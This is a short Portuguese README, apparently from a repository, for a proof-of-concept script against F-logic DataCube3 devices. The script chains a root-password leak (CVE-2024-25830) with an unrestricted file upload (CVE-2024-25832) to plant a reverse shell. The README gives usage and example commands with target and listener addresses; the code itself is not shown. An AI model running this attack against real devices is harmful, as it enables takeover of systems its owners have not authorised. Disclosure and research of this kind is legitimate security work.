
Script de PoC para CVE-2024-25832: Reverse shell em cadeia de exploração, divulgação de informações (vazamento de senha root) + upload de arquivo sem restrições no DataCube3
Este repositório apresenta uma Prova de Conceito (PoC) para uma cadeia de exploração em duas etapas direcionada a dispositivos DataCube3. Ela combina a CVE-2024-25830 (Controle de Acesso Improprio) para extrair senhas de root e a CVE-2024-25832 (Upload de Arquivo Irrestrito) para implantar um script de reverse shell. Esta PoC complementa a análise detalhada de vulnerabilidades no post do blog "Relatório de Vulnerabilidade do DataCube3."
Todos os dispositivos F-logic DataCube3 versão 1.0.
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

APENAS PARA FINS EDUCACIONAIS.